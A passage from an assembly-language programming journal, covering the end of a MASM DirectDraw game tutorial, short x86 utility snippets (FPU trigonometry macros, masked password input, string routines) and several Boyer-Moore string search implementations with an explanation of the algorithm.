addresses into registers.
Then, we compute the number of WORDS in our line. We can then divide this
number by 2, so that we have the number of DWORDS in a line. I have
hard-coded
this number in since we will always be in 640 x 480 x 16 for our game. Once
we
have this number we place it in the register ECX. The reason for this is our
next instruction MOVSD can be combined with the REP label. This will move a
DWORD, decrement ECX by 1, compare ECX to ZERO if not equal then MOVE A
DWORD,
etc. until ECX is equal to zero. In short it is like having a For loop with
the counter in ECX. As we have the code right now, it is moving a DWORD from
the source into the destination until we have exhausted the number of DWORDS
in
our line. At which point it does this over again until we have reached the
number of lines in our height ( 480 in our case ).
Those are our only two functions in the bitmap module. They are short and
sweet. More importantly, now that we have our bitmap and Direct Draw
routines
coded we can write the code to display our loading game screen!
A Game ... Well, Kinda'
-----------------------
The library routines are complete and we are now ready to plunge into our
game
code. We will start out by looking at the game initialization function since
it
is called first in our code.
;########################################################################
; Game_Init Procedure
;########################################################################
Game_Init PROC
;=========================================================
; This function will setup the game
;=========================================================
;============================================
; Initialize Direct Draw -- 640, 480, bpp
;============================================
INVOKE DD_Init, 640, 480, screen_bpp
;====================================
; Test for an error
;====================================
.IF EAX == FALSE
;========================
; We failed so leave
;========================
JMP err
.ENDIF
;======================================
; Read in the bitmap and create buffer
;======================================
INVOKE Create_From_SFP, ADDR ptr_BMP_LOAD, ADDR szLoading,
screen_bpp
;====================================
; Test for an error
;====================================
.IF EAX == FALSE
;========================
; We failed so leave
;========================
JMP err
.ENDIF
;===================================
; Lock the DirectDraw back buffer
;===================================
INVOKE DD_Lock_Surface, lpddsback, ADDR lPitch
;============================
; Check for an error
;============================
.IF EAX == FALSE
;===================
; Jump to err
;===================
JMP err
.ENDIF
;===================================
; Draw the bitmap onto the surface
;===================================
INVOKE Draw_Bitmap, EAX, ptr_BMP_LOAD, lPitch, screen_bpp
;===================================
; Unlock the back buffer
;===================================
INVOKE DD_Unlock_Surface, lpddsback
;============================
; Check for an error
;============================
.IF EAX == FALSE
;===================
; Jump to err
;===================
JMP err
.ENDIF
;=====================================
; Everything okay so flip displayed
; surfaces and make loading visible
;======================================
INVOKE DD_Flip
;============================
; Check for an error
;============================
.IF EAX == FALSE
;===================
; Jump to err
;===================
JMP err
.ENDIF
done:
;===================
; We completed
;===================
return TRUE
err:
;===================
; We didn't make it
;===================
return FALSE
Game_Init ENDP
;########################################################################
; END Game_Init
;########################################################################
This function plays the most important part in our game so far. In this
routine
we make the call to initialize Direct Draw. If this succeeds we load in our
"Loading Game " bitmap file from disk. After that we lock the back buffer.
This
is very important to do since we will be accessing the memory directly.
After
it is locked we can draw our bitmap onto the surface and then unlock it. The
final call in our procedure is to flip the buffers. Since we have the bitmap
on
the back buffer, we need it to be visible. Therefore, we exchange the
buffers.
The front goes to the back and the back goes to the front. At the completion
of
this call our bitmap is now visible on screen. One thing that may be
confusing
here is why we didn't load the bitmap into a Direct Draw surface. The reason
is
we will only be using it once so there was no need to waste a surface.
Next on our list of things to code is the Windows callback function itself.
This function is how we handle messages in Windows. Anytime we want to
handle a
message the code will go in this function. Take a look at how we have it
setup
currently.
;########################################################################
; Main Window Callback Procedure -- WndProc
;########################################################################
WndProc PROC hWin :DWORD,
uMsg :DWORD,
wParam :DWORD,
lParam :DWORD
.IF uMsg == WM_COMMAND
;===========================
; We don't have a menu, but
; if we did this is where it
; would go!
;===========================
.ELSEIF uMsg == WM_KEYDOWN
;=======================================
; Since we don't have a Direct input
; system coded yet we will just check
; for escape to be pressed
;=======================================
MOV EAX, wParam
.IF EAX == VK_ESCAPE
;===========================
; Kill the application
;===========================
INVOKE PostQuitMessage,NULL
.ENDIF
;==========================
; We processed it
;==========================
return 0
.ELSEIF uMsg == WM_DESTROY
;===========================
; Kill the application
;===========================
INVOKE PostQuitMessage,NULL
return 0
.ENDIF
;=================================================
; Let the default procedure handle the message
;=================================================
INVOKE DefWindowProc,hWin,uMsg,wParam,lParam
RET
WndProc endp
;########################################################################
; End of Main Windows Callback Procedure
;########################################################################
The code is fairly self-explanatory. So far we only deal with 2 messages the
WM_KEYDOWN message and the WM_DESTROY message. We process the WM_KEYDOWN
message so that the user can hit escape and exit our game. We will be coding
a
Direct Input system, but until then we needed a way to quit the game! The
one
thing you should notice is that any messages we do not deal with are handled
by
the "default" processing function -- DefWindowProc(). This function is
defined
by Windows already. You just need to call it whenever you do not handle a
message.
The game main function we aren't going to look at, simply because it is
empty.
We haven't added any solid code to our game loop yet. But, everything is
prepared so that next time we can get to it. That then leaves us with the
shutdown code.
;########################################################################
; Game_Shutdown Procedure
;########################################################################
Game_Shutdown PROC
;============================================================
; This shuts our game down and frees memory we allocated
;============================================================
;===========================
; Shutdown DirectDraw
;===========================
INVOKE DD_ShutDown
;==========================
; Free the bitmap memory
;==========================
INVOKE GlobalFree, ptr_BMP_LOAD
done:
;===================
; We completed
;===================
return TRUE
err:
;===================
; We didn't make it
;===================
return FALSE
Game_Shutdown ENDP
;########################################################################
; END Game_Shutdown
;########################################################################
Here we make the call to shutdown our Direct Draw library, and we also free
the
memory we allocated earlier for the bitmap. We could have freed the memory
elsewhere and maybe next issue we will. But, things are a bit easier to
understand when all of your initialization and cleanup code is in one place.
As you can see there isn't that much code in our game specific stuff. The
majority resides in our modules, such as Direct Draw. This allows us to keep
our code clean and any changes we may need to make later on a much easier
since
things aren't hard-coded inline. Anyway, the end result of what you have
just
seen is a Loading screen that is displayed until the user hits the escape
key.
And that ... primitive though it may be ... is our game thus far.
Until Next Time ...
-------------------
We covered a lot of material in this article. We now have a bitmap library,
and
a Direct Draw library for our game. These are core modules that you should
be
able to use in any game. By breaking up the code like this we are able to
keep
our game code separate from the library code. You do not want any module to
be
dependent on another module.
In the next article we will be continuing our module development with Direct
Input. We will also be creating our menu system next time. These two things
should keep us busy. So, that is what you have to look forward to in the
next
installment.
Once again young grasshoppers, until next time ... happy coding.
Get the complete source for the game here:
http://asmjournal.freeservers.com/files/game2.zip
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
Basic trigonometry
functions
by Eoin O'Callaghan
;Summary: Basic trigonometry functions not directly supported on the
FPU
; (ArcCos, ArcSin, HSin, HCos and HTan).
;Compatibility: Floating-Point Unit.
;Notes: None.
.data
hPi dt 3FFFC90FDAA22168C235h ; tbyte
iL2e dt 3FFEB17217F7D1CF79ACh ; tbyte
half dd 0.5
ArcCos MACRO ;Inverse Cosine, st(0) = arccos(st(0))
fld1
fld st(1)
fmul st,st
fsub
fsqrt
fpatan
fchs
fld hPi
fadd
EndM
ArcSin Macro ;Inverse Sine, st(0) = arcsin(st(0))
fld1
fld st(1)
fmul st,st
fsub
fsqrt
fpatan
EndM
HSin Macro ;Hyperbolic Sin, st(0) = hsin(st(0)
fldl2e
fmul
fld st
frndint
fsub st(1),st
fld1
fscale
fxch
fstp st
fxch
f2xm1
fld1
fadd
fmul
fld st
fld1
fdivr
fsub
fmul half
EndM
HCos Macro ;Hyperbolic Cos, st(0) = hcos(st(0)
fldl2e
fmul
fld st
frndint
fsub st(1),st
fld1
fscale
fxch
fstp st
fxch
f2xm1
fld1
fadd
fmul
fld st
fld1
fdivr
fadd
fmul half
EndM
HTan Macro ;Hyperbolic Tan, st(0) = htan(st(0)
fldl2e
fmul
fld st
frndint
fsub st(1),st
fld1
fscale
fxch
fstp st
fxch
f2xm1
fld1
fadd
fmul
fmul st,st
fld st
fld1
fadd
fxch
fld1
fsub
fdivr
EndM
getpass
by Jake
Bush
;Summary: Get a password type input.
;Compatibility: x86
;Notes: input:
; BX = Max length to save.
; ES:DI = Location to save the input. (Size must be at
least
; BX + 1).
; output:
; none.
getpass:
pusha
xor cx, cx
.1: xor ah, ah
int 16h
cmp al, 0dh
je .4
cmp cx, 0h
je .2
cmp al, 8h
je .3
.2: cmp cx, bx
je .1
cmp al, 20h
jb .1
stosb
pusha
mov al, '*'
mov ah, 0eh
xor bh, bh
mov cx, 1h
int 10h
popa
inc cx
jmp .1
.3: dec di
dec cx
pusha
mov al, 8h
mov ah, 0eh
xor bh, bh
mov cx, 1h
int 10h
mov al, ' '
int 10h
mov al, 8h
int 10h
popa
jmp .1
.4: mov al, 0h
stosb
popa
ret
strcmp
by Jake
Bush
;Summary: Compares two strings.
;Compatibility: x86
;Notes: input:
; DS:SI = String 1.
; ES:DI = String 2.
; output:
; CF = 0 = Equal
; 1 = Unequal
strcmp:
pusha
.1: mov al, [ds:si]
mov ah, [es:di]
cmp ah, al
jne .2
cmp ax, 0h
je .3
inc si
inc di
jmp .1
.2: stc
jmp .4
.3: clc
.4: popa
ret
strlwr
by Jake
Bush
;Summary: Converts all the characters in a ASCIIz string to
lower-case.
;Compatibility: x86
;Notes: input:
; DS:SI = Location of an string to convert.
; ES:DI = Location to save the converted string.
; output:
; none.
strlwr:
pusha
.1: lodsb
cmp al, 0h
je .3
cmp al, 41h
jb .2
cmp al, 90h
ja .2
or al, 00100000b
.2: stosb
jmp .1
.3: popa
ret
strupr
by Jake
Bush
;Summary: Converts all the characters in a ASCIIz string to
upper-case.
;Compatibility: x86
;Notes: input:
; DS:SI = Location of an string to convert.
; ES:DI = Location to save the converted string.
; output:
; none.
strupr:
pusha
.1: lodsb
cmp al, 0h
je .3
cmp al, 61h
jb .2
cmp al, 7ah
ja .2
xor al, 00100000b
.2: stosb
jmp .1
.3: popa
ret
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
Challenge
---------
Code a fast pattern matching algorithm.
Solution
--------
Four approaches are presented here, three by Steve Hutchesson, who also
wrote a
very good introductory text explaining the foundation of the Boyer Moore
search
algorithm and its variations, and one by buliaNaza who aims at writing the
fastest binary string search algorithm for PPlain and PMMX processors.
Three Boyer Moore Exact Pattern Matching
Algorithms
by Steve Hutchesson
Three Boyer Moore Exact Pattern Matching Algorithms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Steve Hutchesson
Sydney
Australia
August 2001
hutch@...
In 1977 Robert Boyer and L. Moore designed an exact pattern matching
algorithm that was different from any of the contemporary designs of the
time. It had a fundamentally different logic that compared the pattern
being searched for to the current location in the source in reverse order.
The logic was based on obtaining more information from performing the
comparison in reverse than the standard methods of forward comparison. If a
character that caused the mismatch was not among the characters that were
in the pattern being matched, there was no point in matching any further
characters so the pattern could be shifted right by the number of
characters needed to go past it.
This shift has usually been called the BAD CHARACTER shift.
|
source : bad character shift
pattern : shift
|
Character "t" mismatches with character "c" in the source. "c" is not in
the pattern being searched for and there is no point in searching further
back as no match is possible at the current location so the pattern is
shifted the number of places right so that the pattern is completely past
the mismatching character.
|
source : bad character shift
pattern : shift
|
Character "t" again mismatches with character "c" in the source so the
pattern is again shifted completely past the mismatching character.
|
source : bad character shift
pattern : shift
|
The next mismatch is different to the previous ones, it is with a character
that is within the pattern being searched for and this requires a different
type of shift. When a character is within the pattern, it allows the
capacity to start matching the pattern to the source. This shift is usually
called the GOOD SUFFIX shift but it is sometimes called the MATCHING SHIFT.
The fundamental Boyer Moore design uses a clever method of determining if
the character being compared is within the pattern being searched for or
not. It constructs a table of 256 members which is initially filled with
the length of the pattern being searched for in the source. It then
overwrites the position of each character in the pattern into the table at
the correct position for the character's ascii value.
This means that a character being compared can be tested in one memory read
to determine if it is within the pattern or not, if the shift in the table
is the same length as the pattern, the character is not in the pattern, if
it is less, it is a character that is in the pattern.
This will produce a set of shifts for the character in the pattern that
descend in their value.
pattern : shift
4321 <- GOOD SUFFIX shift
12345 <- BAD CHARACTER shift
The method of calculating the BAD CHARACTER shift is based on the ascending
count from the beginning of the pattern. If it is the first character being
compared, the shift is the length of the pattern, for each comparison made,
the shift decrements by one.
Apply the GOOD SUFFIX shift from the table and the pattern is shifted
across so that the character "s" lines up with the "s" in the source and
the pattern has been matched.
*
source : bad character shift
pattern : shift
*
This example works OK because the mismatch occurs on the first comparison
but in patterns that have repeat sequences of characters, this matching by
itself will often fail to produce a match.
pattern : foooooo
711111 <- GOOD SUFFIX shift
1234567 <- BAD CHARACTER shift
The sequence of "1" in the GOOD SUFFIX shift is caused by the overwriting
of the location for the character "o" in the table for each of its
occurrences. The normal method is to subtract the BAD CHARACTER shift from
the GOOD SUFFIX shift if the mismatch is not the first at the current
location in the source. This can produce a value less than 1 so a minimum
shift of 1 is applied if this happens.
Coding Considerations
~~~~~~~~~~~~~~~~~~~~~
Much of the available technical data on exact pattern matching is written
in ANSI C and it tends to carry the set of assumptions related to the
capacity of that language. The "holy grail" of exact pattern matching is to
perform as few comparisons as necessary to obtain the match if it exists.
This is usually called "sublinearity" and it means comparing less
characters that a traditional forward BYTE scanner.
The problem with this approach is that if the overhead to produce the
"sublinearity" is too large, the algorithm is slower than a BYTE scanner so
considerations of theoretical design must be tempered with what is possible
with good coding practice to deliver the desired speed.
The BAD CHARACTER shift has often been coded in high level languages as
another table but it is a very inefficient way to code the shift as the
loop counter in the main comparison loop holds the same value and it can be
accessed a lot faster than a member of a table in memory.
The three version presented below use an Intel specific optimisation
related to preventing a register stall by reading and comparing a byte in
AL and subsequently using the EAX register in the table location
calculation. XOR EAX, EAX or SUB EAX, EAX both zero the register and the
stall does not occur. This makes the code slightly slower on AMD hardware
but not by very much.
There is an additional heuristic in the original Boyer Moore algorithm that
has not been implemented, when a BAD CHARACTER shift has been determined,
the heuristic requires that the larger of the two shifts should be applied.
In practice the two extra instructions to perform this comparison reduce
the speed of the algorithm by about 5%.
Where a GOOD SUFFIX shift is required that is the first mismatch at the
current location, the calculation that subtracts the BAD CHARACTER shift is
not required so a seperate loop has been included to save this extra two
instructions. The speed increase is about 5% for doing so.
Processor Variation
~~~~~~~~~~~~~~~~~~~
Testing shows that there is measurable differences between later Intel
processors and later AMD processors. The AMD has a shorter pipeline and a
lower penalty for register stalls where the Intel processors have better
branch prediction and a lower penalty for mispredicted jumps. The GOOD
SUFFIX shift favours the AMD processors where the BAD CHARACTER shift works
better on the Intel processors.
Three variations are implemented that utilise the different shifts, the
original BM algorithm uses both shifts, a variation that is similar to a
Horspool variation uses only the BAD CHARACTER shift and another variation
only uses the GOOD SUFFIX shift.
Algorithm Variations
~~~~~~~~~~~~~~~~~~~~
The original BM algorithm has a slightly higher overhead than the two
variations but it generally produces a larger shift and this has the effect
that it is more consistent across both processor types with different
patterns and different pattern lengths. This is because it it more
dependent on logic that fast loop code.
The Horspool variation perfoms well on Intel hardware and is well suited for
plain text search in things like text editors and word processors but it is
sensitive to patterns that have a high frequency of characters in the source
being searched. Its advantage is small loop code in the searching phase. In
this implementation, it does the comparison in reverse order as this method
produces the BAD CHARACTER shift in the most efficient manner.
The second variation uses only the GOOD SUFFIX shift and generally performs
well on older Intel hardware and later AMD machines. It has the advantage of
fast loop code but by only using one of the available shifts, its average
shift
length is shorter than the original algorithm. It uses the same bypass for
the
first mismatch that the original BM algo has.
Limitations
~~~~~~~~~~~
The pattern length threshold for improving on a forward byte scanner appears
to
be about 6 characters. Below this a BYTE scanner is faster. A BM type
algorithm
has about a 300 character penalty in the time it takes to construct the
table
and this must be kept in mind if the task requires recursively searching
short
sources for short patterns.
A slightly more subtle consideration is what is called "mismatch recovery".
Boyer Moore algorithms have normally been sensitive to the frequency of end
characters in the pattern and this is easy to demonstrate when searching
plain
text when the pattern has a trailing blank space in it. EXAMPLE : "pattern "
The solution is to code the comparison loop with a very short instruction
path
and while this does not particularly increase the absolute forward scanning
speed of the algorithm type, it does improve its recovery from repeated
mismatches.
The three algorithms presented below have very good mismatch recovery which
is
related to their very short comparison loops instruction paths.
The three algorithms have been tested on Intel Celeron, PII and PIII
machines
and AMD K6-2, Duron and Athlon machines. They have been optimised to run on
both types without specifically targetting one particular model. Slight
speed
increases can be obtained by coding specifically for one particular model
but usually at the expense of most other processors.
The parameters for the 3 procedures.
startpos zero based offset to start searching in the source
lpSource the address of the source to search
srcLngth the length of the source
lpSubStr the address of the pattern to search for
subLngth the length of the pattern
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ The basic Boyer Moore algorithm @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
; #########################################################################
.486
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive
.code
; #########################################################################
BMBinSearch proc startpos:DWORD,
lpSource:DWORD,srcLngth:DWORD,
lpSubStr:DWORD,subLngth:DWORD
LOCAL cval :DWORD
LOCAL shift_table[256]:DWORD
push ebx
push esi
push edi
mov ebx, subLngth
cmp ebx, 1
jg @F
mov eax, -2 ; string too short, must be > 1
jmp Cleanup
@@:
mov esi, lpSource
add esi, srcLngth
sub esi, ebx
mov edx, esi ; set Exit Length
; ----------------------------------------
; load shift table with value in subLngth
; ----------------------------------------
mov ecx, 256
mov eax, ebx
lea edi, shift_table
rep stosd
; ----------------------------------------------
; load decending count values into shift table
; ----------------------------------------------
mov ecx, ebx ; SubString length in ECX
dec ecx ; correct for zero based index
mov esi, lpSubStr ; address of SubString in ESI
lea edi, shift_table
xor eax, eax
Write_Shift_Chars:
mov al, [esi] ; get the character
inc esi
mov [edi+eax*4], ecx ; write shift for each character
dec ecx ; to ascii location in table
jnz Write_Shift_Chars
; -----------------------------
; set up for main compare loop
; -----------------------------
mov ecx, ebx
dec ecx
mov cval, ecx
mov esi, lpSource
mov edi, lpSubStr
add esi, startpos ; add starting position
jmp Pre_Loop
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Calc_Suffix_Shift:
add eax, ecx
sub eax, cval ; sub loop count
jns Add_Suffix_Shift
mov eax, 1 ; minimum shift is 1
Add_Suffix_Shift:
add esi, eax ; add SUFFIX shift
mov ecx, cval ; reset counter in compare loop
Test_Length:
cmp edx, esi ; test exit condition
jl No_Match
Pre_Loop:
xor eax, eax ; zero EAX for following partial writes
mov al, [esi+ecx]
cmp al, [edi+ecx] ; cmp characters in ESI / EDI
je @F
mov eax, shift_table[eax*4]
cmp ebx, eax
jne Add_Suffix_Shift ; bypass SUFFIX calculations
lea esi, [esi+ecx+1] ; add BAD CHAR shift
jmp Test_Length
@@:
dec ecx
xor eax, eax ; zero EAX for following partial writes
Cmp_Loop:
mov al, [esi+ecx]
cmp al, [edi+ecx] ; cmp characters in ESI / EDI
jne Set_Shift ; if not equal, get next shift
dec ecx
jns Cmp_Loop
jmp Match ; fall through on match
Set_Shift:
mov eax, shift_table[eax*4]
cmp ebx, eax
jne Calc_Suffix_Shift ; run SUFFIX calculations
lea esi, [esi+ecx+1] ; add BAD CHAR shift
jmp Test_Length
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Match:
sub esi, lpSource ; sub source from ESI
mov eax, esi ; put length in eax
jmp Cleanup
No_Match:
mov eax, -1
Cleanup:
pop edi
pop esi
pop ebx
ret
BMBinSearch endp
; #########################################################################
end
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ The Horspool style variation using the BAD CHARACTER shift @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
; #########################################################################
.486
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive
.code
; #########################################################################
BMHBinsearch proc startpos:DWORD,
lpSource:DWORD,srcLngth:DWORD,
lpSubStr:DWORD,subLngth:DWORD
LOCAL cval:DWORD
LOCAL shift_table[256]:DWORD
push ebx
push esi
push edi
mov ebx, subLngth
cmp ebx, 1
jg @F
mov eax, -2 ; string too short, must be > 1
jmp BMHout
@@:
mov esi, lpSource
add esi, srcLngth
sub esi, ebx
mov edx, esi ; set Exit Length
; ----------------------------------------
; load shift table with value in subLngth
; ----------------------------------------
mov ecx, 256
mov eax, ebx
lea edi, shift_table
rep stosd
; ----------------------------------------------
; load decending count values into shift table
; ----------------------------------------------
mov ecx, ebx ; SubString length in ECX
dec ecx ; correct for zero based index
mov esi, lpSubStr ; address of SubString in ESI
lea edi, shift_table
xor eax, eax
Write_Chars:
mov al, [esi] ; get the character
inc esi
mov [edi+eax*4], ecx ; write shift for each character
dec ecx ; to ascii location in table
jnz Write_Chars
; -----------------------------
; set up for main compare loop
; -----------------------------
mov ecx, ebx
dec ecx
mov cval, ecx
mov esi, lpSource
mov edi, lpSubStr
add esi, startpos ; add starting position
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Main_Loop:
sub eax, eax ; zero EAX before partial write
mov al, [esi+ecx]
cmp al, [edi+ecx] ; cmp characters in ESI / EDI
jne Get_Shift ; if not equal, get next shift
dec ecx
jns Main_Loop
jmp Matchx
Get_Shift:
inc esi ; inc esi for minimum shift
cmp ebx, shift_table[eax*4] ; cmp subLngth to char shift
jne Exit_Test
add esi, ecx ; add bad char shift
Exit_Test:
mov ecx, cval ; reset counter in compare loop
cmp esi, edx ; test for exit condition
jl Main_Loop
jmp MisMatch
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Matchx:
sub esi, lpSource ; sub source from ESI
mov eax, esi ; put length in eax
jmp BMHout
MisMatch:
mov eax, -1
BMHout:
pop edi
pop esi
pop ebx
ret
BMHBinsearch endp
; #########################################################################
end
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ The simplified version using the GOOD SUFFIX shift @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
; #########################################################################
.486
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive
.code
; #########################################################################
SBMBinSearch proc startpos:DWORD,
lpSource:DWORD,srcLngth:DWORD,
lpSubStr:DWORD,subLngth:DWORD
LOCAL shift_table[256]:DWORD
push ebx
push esi
push edi
mov edx, subLngth
cmp edx, 1
jg @F
mov eax, -2 ; string too short, must be > 1
jmp Cleanup
@@:
mov esi, lpSource
add esi, srcLngth
sub esi, edx
mov ebx, esi ; set Exit Length
; ----------------------------------------
; load shift table with value in subLngth
; ----------------------------------------
mov ecx, 256
mov eax, edx
lea edi, shift_table
rep stosd
; ----------------------------------------------
; load decending count values into shift table
; ----------------------------------------------
mov ecx, edx ; SubString length in ECX
dec ecx ; correct for zero based index
mov esi, lpSubStr ; address of SubString in ESI
lea edi, shift_table
xor eax, eax
Write_Shift_Chars:
mov al, [esi] ; get the character
inc esi
mov [edi+eax*4], ecx ; write shift for each character
dec ecx ; to ascii location in table
jnz Write_Shift_Chars
; -----------------------------
; set up for main compare loop
; -----------------------------
mov esi, lpSource
mov edi, lpSubStr
dec edx
xor eax, eax ; zero EAX
add esi, startpos ; add starting position
jmp Cmp_Loop
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Calc_Suffix_Shift:
add ecx, shift_table[eax*4] ; add shift value to loop counter
sub ecx, edx ; sub pattern length
jns Pre_Compare
mov ecx, 1 ; minimum shift is 1
Pre_Compare:
add esi, ecx ; add suffix shift
mov ecx, edx ; reset counter for compare loop
Exit_Text:
cmp ebx, esi ; test exit condition
jl No_Match
xor eax, eax ; clear EAX for following partial writes
mov al, [esi+ecx]
cmp al, [edi+ecx] ; cmp characters in ESI / EDI
je @F
add esi, shift_table[eax*4]
jmp Exit_Text
@@:
dec ecx
xor eax, eax ; clear EAX for following partial writes
Cmp_Loop:
mov al, [esi+ecx]
cmp al, [edi+ecx] ; cmp characters in ESI / EDI
jne Calc_Suffix_Shift ; if not equal, get next shift
dec ecx
jns Cmp_Loop
jmp Match ; match on fall through
; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Match:
sub esi, lpSource ; sub source from ESI
mov eax, esi ; put length in eax
jmp Cleanup
No_Match:
mov eax, -1
Cleanup:
pop edi
pop esi
pop ebx
ret
SBMBinSearch endp
; #########################################################################
end
********************************** END *************************************
Fastest Binary String Search
Algorithm
by buliaNaza
; Fastest binary string search algo with
; PPlain and PMMX type of processors
; <c> 2001 by buliaNaza ;
; ;
.data? ;
align 4 ; !!!
skip_table DD 256 Dup(?) ; skip table
; ;
;...............................;
; Usage: esi ->pBuffer ; esi->buffer with bytes to be searched
through
; ebp = lenBuffer ; ebp =length of the buffer
; ebx ->pSrchData ; ebx->pointer to data to be searched for
; edx = lenSrchData ; edx=length of data to be searched for
; edi ->pskip_table ; edi->pointer to skip table (must be
aligned)
; call BMCaseSNext ;
;.................................;
.code ;
BMCaseSNext: ;
cmp edx, 4 ; edx = length of data to be searched for
jg Boyer_Moore ;
;... Brute Force Search ..........; for 4 digits or less only!
mov edi, [ebx] ; edi = dword of data to be searched for
mov ecx, 5 ;
sub ecx, edx ;
lea eax, [esi+edx-1] ; eax->new starting address in pBuffer
shl ecx, 3 ; *8
mov bl, [ebx+edx-1] ; get last byte only
mov bh, bl ; copy in bh
bswap edi ;
shr edi, cl ;
add ebp, esi ; ebp ->end of buffer
and ebx, 0FFFFh ; ebx = need the bx word only
mov ecx, ebx ;
mov esi, edx ; esi=edx = length of data to be searched
for
shl ecx, 16 ;
test eax, 3 ;
lea ebx, [ebx+ecx] ;
jz Search_2 ;
Unalign_1: ;
cmp eax, ebp ; ebp ->end of buffer
jge Not_found ;
mov cl, [eax] ;
inc eax ;
cmp cl, bl ;
jz Compare_1 ;
Search_1: ;
test eax, 3 ;
jnz Unalign_1 ;
Search_2: ;
cmp eax, ebp ;u ebp ->end of buffer
jge Not_found ;v
mov ecx, [eax] ;u scasb for the last byte from pSrchData
add eax, 4 ;v
xor ecx, ebx ;u
mov edx, 7EFEFEFFh ;v
add edx, ecx ;u
xor ecx, -1 ;v
xor ecx, edx ;u
mov edx, [eax-4] ;v
and ecx, 81010100h ;u
jz Search_2 ;v
;
cmp dl, bl ;
jz Minus_4 ;
cmp dh, bl ;
jz Minus_3 ;
shr edx, 16 ;
cmp dl, bl ;
jz Minus_2 ;
cmp dh, bl ;
jz Compare_1 ;
jnz Search_2 ;
Minus_2: ;
dec eax ;
jnz Compare_1 ;
Minus_4: ;
sub eax, 3 ;
jnz Compare_1 ;
Minus_3: ;
sub eax, 2 ;
Compare_1: ;
mov edx, edi ;
cmp eax, ebp ; ebp ->end of buffer
jg Not_found ;
cmp esi, 1 ;
jz Found_1 ;
cmp dl, [eax-2] ; eax->pBuffer
jnz Search_1 ;
cmp esi, 2 ;
jz Found_1 ;
cmp dh, [eax-3] ; eax->pBuffer
jnz Search_1 ;
cmp esi, 3 ;
jz Found_1 ;
shr edx, 16 ;
mov cl, [eax-4] ; eax->pBuffer
cmp dl, cl ;
jnz Search_1 ;
Found_1: ;
sub eax, esi ; in eax->pointer to 1st
ret ; occurrence of data found in pBuffer
;...Boyer Moore Case Sens Next Search...;
Boyer_Moore: ;
add esi, ebp ; esi->pointer to the last byte of pBuffer
lea ebx, [ebx+edx-1] ; ebx->pointer to the last byte of
pSrchData
neg edx ; edx= -lenSrchData
mov ecx, edx ; ecx = edx = -lenSrchData
add ebp, edx ; sub lenSrchData from lenBuffer
mov eax, 256 ; eax = counter
xor ebp, -1 ; not ebp->current negative index
MaxSkipLens: ;
mov [eax*4+edi-4], edx ; filling up the skip_table with
-lenSrchData
mov [eax*4+edi-8], edx ;
mov [eax*4+edi-12], edx ;
mov [eax*4+edi-16], edx ;
mov [eax*4+edi-20], edx ;
mov [eax*4+edi-24], edx ;
mov [eax*4+edi-28], edx ;
mov [eax*4+edi-32], edx ;
mov [eax*4+edi-36], edx ;
mov [eax*4+edi-40], edx ;
mov [eax*4+edi-44], edx ;
mov [eax*4+edi-48], edx ;
mov [eax*4+edi-52], edx ;
mov [eax*4+edi-56], edx ;
mov [eax*4+edi-60], edx ;
mov [eax*4+edi-64], edx ;
mov [eax*4+edi-68], edx ;
mov [eax*4+edi-72], edx ;
mov [eax*4+edi-76], edx ;
mov [eax*4+edi-80], edx ;
mov [eax*4+edi-84], edx ;
mov [eax*4+edi-88], edx ;
mov [eax*4+edi-92], edx ;
mov [eax*4+edi-96], edx ;
mov [eax*4+edi-100], edx ;
mov [eax*4+edi-104], edx ;
mov [eax*4+edi-108], edx ;
mov [eax*4+edi-112], edx ;
mov [eax*4+edi-116], edx ;
mov [eax*4+edi-120], edx ;
mov [eax*4+edi-124], edx ;
mov [eax*4+edi-128], edx ;
sub eax, 32 ;
jne MaxSkipLens ; loop while eax=0
SkipLens: ;
mov al, [ecx+ebx+1] ;u filling up with the real negative offset of
inc ecx ;v every byte from the pSrchData, starting
from
mov [eax*4+edi], ecx ;u the last to the first, at the offset in
jne SkipLens ;v skip_table equal to the ASCII code of the
; byte, multiplied by 4
Search: ; the main searching loop-> FAST PART
mov al, [esi+ebp] ;u get a byte from pBuffer ->esi +ebp
mov ecx, edx ;v ecx=edx= -lenSrchData
sub ebp, [eax*4+edi] ;u sub negative offset for this byte from
; skip_table
jc Search ;v if dword ptr [eax*4+edi] AND ebp <> 0 loop
; again
lea ebp, [ebp+esi+1] ;u current negative index -> next byte (+1)
jge Not_found ;v end of pBuffer control (if ebp>=0 end)
; compare previous bytes from pSrchData
(->ebx)
Compare: ; and current offset in pBuffer (->ebp)->SLOW
; PART
mov eax, [ebx+ecx+1] ; one dword from pSrchData -> ebx
